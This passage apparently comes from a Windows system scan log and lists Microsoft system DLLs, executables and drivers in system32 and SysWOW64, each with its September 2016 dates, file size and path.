2016-09-30 06:31 - 2016-09-15 18:49 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2016-09-30 06:31 - 2016-09-15 18:49 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-09-30 06:31 - 2016-09-15 18:49 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2016-09-30 06:31 - 2016-09-15 18:48 - 01321472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2016-09-30 06:31 - 2016-09-15 18:48 - 01112576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2016-09-30 06:31 - 2016-09-15 18:47 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-09-30 06:31 - 2016-09-15 18:47 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll
2016-09-30 06:31 - 2016-09-15 18:47 - 00366080 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2016-09-30 06:31 - 2016-09-15 18:47 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll
2016-09-30 06:31 - 2016-09-15 18:47 - 00134656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Energy.dll
2016-09-30 06:31 - 2016-09-15 18:46 - 22566912 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-09-30 06:31 - 2016-09-15 18:46 - 03305984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-09-30 06:31 - 2016-09-15 18:46 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2016-09-30 06:31 - 2016-09-15 18:46 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2016-09-30 06:31 - 2016-09-15 18:46 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ffbroker.dll
2016-09-30 06:31 - 2016-09-15 18:45 - 12174848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-09-30 06:31 - 2016-09-15 18:45 - 02642944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2016-09-30 06:31 - 2016-09-15 18:45 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dlnashext.dll
2016-09-30 06:31 - 2016-09-15 18:44 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2016-09-30 06:31 - 2016-09-15 18:44 - 00209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAC3ENC.DLL
2016-09-30 06:31 - 2016-09-15 18:43 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imapi2.dll
2016-09-30 06:31 - 2016-09-15 18:43 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfksproxy.dll
2016-09-30 06:31 - 2016-09-15 18:43 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll
2016-09-30 06:31 - 2016-09-15 18:43 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\splwow64.exe
2016-09-30 06:31 - 2016-09-15 18:43 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys
2016-09-30 06:31 - 2016-09-15 18:43 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2016-09-30 06:31 - 2016-09-15 18:42 - 01220608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2016-09-30 06:31 - 2016-09-15 18:42 - 00719872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_sr.dll
2016-09-30 06:31 - 2016-09-15 18:42 - 00492544 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe
2016-09-30 06:31 - 2016-09-15 18:42 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll
2016-09-30 06:31 - 2016-09-15 18:42 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2016-09-30 06:31 - 2016-09-15 18:42 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winhvr.sys
2016-09-30 06:31 - 2016-09-15 18:41 - 06043136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.SyncEngine.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Client.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00108032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Authentication.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Printers.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll
2016-09-30 06:31 - 2016-09-15 18:41 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NfcRadioMedia.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 02646016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 01988096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFi.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ACPBackgroundManagerPolicy.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMapi.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.Ngc.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthRadioMedia.dll
2016-09-30 06:31 - 2016-09-15 18:40 - 00082432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.UserDeviceAssociation.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 02740224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 02254848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 01595904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00711168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00418304 _____ C:\WINDOWS\system32\Windows.Perception.Stub.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00408576 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnr.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\system32\pdh.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Radios.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 02999296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2016-09-30 06:31 - 2016-09-15 18:38 - 02005504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 01291264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00850944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00773120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2016-09-30 06:31 - 2016-09-15 18:38 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00671232 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkCollectionAgent.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00573952 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnrGidsHandler.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00505856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFiDirect.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.Phone.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovhost.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-09-30 06:31 - 2016-09-15 18:38 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\provops.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchFilterHost.exe
2016-09-30 06:31 - 2016-09-15 18:38 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SerialCommunication.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00132096 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintWSDAHost.dll
2016-09-30 06:31 - 2016-09-15 18:38 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00743424 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00690176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00568320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.LowLevel.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00321024 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkUXBroker.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.HumanInterfaceDevice.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\biwinrt.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 03105792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2016-09-30 06:31 - 2016-09-15 18:36 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Import.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00719360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2016-09-30 06:31 - 2016-09-15 18:36 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00686592 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsregcmd.exe
2016-09-30 06:31 - 2016-09-15 18:36 - 00648192 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngccredprov.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00561664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Wallet.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00407552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00379904 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00166912 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovslegacy.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupugc.exe
2016-09-30 06:31 - 2016-09-15 18:35 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.PointOfService.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00538112 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00480768 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsreg.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00472064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Picker.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00305152 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvc.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataExchange.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00252416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\easwrt.dll
2016-09-30 06:31 - 2016-09-15 18:34 - 00441856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AccountsRt.dll
2016-09-30 06:31 - 2016-09-15 18:34 - 00437248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Usb.dll
2016-09-30 06:31 - 2016-09-15 18:34 - 00424960 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2016-09-30 06:31 - 2016-09-15 18:34 - 00284160 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2016-09-30 06:31 - 2016-09-15 18:33 - 03753984 _____ (Microsoft Corporation) C:\WINDOWS\system32\bootux.dll
2016-09-30 06:31 - 2016-09-15 18:33 - 01004032 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-09-30 06:31 - 2016-09-15 18:33 - 00963584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll
2016-09-30 06:31 - 2016-09-15 18:33 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-09-30 06:31 - 2016-09-15 18:33 - 00512000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprapi.dll
2016-09-30 06:31 - 2016-09-15 18:32 - 02716672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2016-09-30 06:31 - 2016-09-15 18:32 - 00634368 _____ (Microsoft Corporation) C:\WINDOWS\system32\StructuredQuery.dll
2016-09-30 06:31 - 2016-09-15 18:32 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2016-09-30 06:31 - 2016-09-15 18:31 - 09129984 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-09-30 06:31 - 2016-09-15 18:31 - 01912320 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2016-09-30 06:31 - 2016-09-15 18:31 - 01553408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2016-09-30 06:31 - 2016-09-15 18:31 - 01053184 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll
2016-09-30 06:31 - 2016-09-15 18:31 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2016-09-30 06:31 - 2016-09-15 18:30 - 01639424 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2016-09-30 06:31 - 2016-09-15 18:30 - 01589248 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2016-09-30 06:31 - 2016-09-15 18:30 - 01227264 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll
2016-09-30 06:31 - 2016-09-15 18:30 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll
2016-09-30 06:31 - 2016-09-15 18:30 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\CastLaunch.dll
2016-09-30 06:31 - 2016-09-15 18:29 - 01105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll
2016-09-30 06:31 - 2016-09-15 18:29 - 01082368 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-09-30 06:31 - 2016-09-15 18:29 - 00720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.BackgroundMediaPlayback.dll
2016-09-30 06:31 - 2016-09-15 18:29 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2016-09-30 06:31 - 2016-09-15 18:29 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RelPost.exe
2016-09-30 06:31 - 2016-09-15 18:28 - 23680512 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-09-30 06:31 - 2016-09-15 18:28 - 03288064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2016-09-30 06:31 - 2016-09-15 18:28 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2016-09-30 06:31 - 2016-09-15 18:28 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2016-09-30 06:31 - 2016-09-15 18:28 - 00718848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.BackgroundMediaPlayer.dll
2016-09-30 06:31 - 2016-09-15 18:28 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 05111296 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 02860032 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 01078784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00702976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.MediaPlayer.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00627200 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceControl.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00582656 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\discan.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\manage-bde.exe
2016-09-30 06:31 - 2016-09-15 18:27 - 00171008 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvenotify.exe
2016-09-30 06:31 - 2016-09-15 18:27 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Sens.dll
2016-09-30 06:31 - 2016-09-15 18:26 - 13081088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-09-30 06:31 - 2016-09-15 18:26 - 00501248 _____ (Microsoft Corporation) C:\WINDOWS\system32\imapi2.dll
2016-09-30 06:31 - 2016-09-15 18:26 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll
2016-09-30 06:31 - 2016-09-15 18:26 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2016-09-30 06:31 - 2016-09-15 18:26 - 00112128 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe
2016-09-30 06:31 - 2016-09-15 18:26 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeui.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00947200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_sr.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00804864 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceAgent.exe
2016-09-30 06:31 - 2016-09-15 18:25 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\BackgroundMediaPolicy.dll
2016-09-30 06:31 - 2016-09-15 18:24 - 01080320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Ocr.dll
2016-09-30 06:31 - 2016-09-15 18:24 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 08122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 01361408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 01020928 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 00650752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 00631296 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 00611328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 00347648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 08075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 01709056 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 01586176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 00983040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 00960000 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 00857600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 00770560 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 00376832 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll
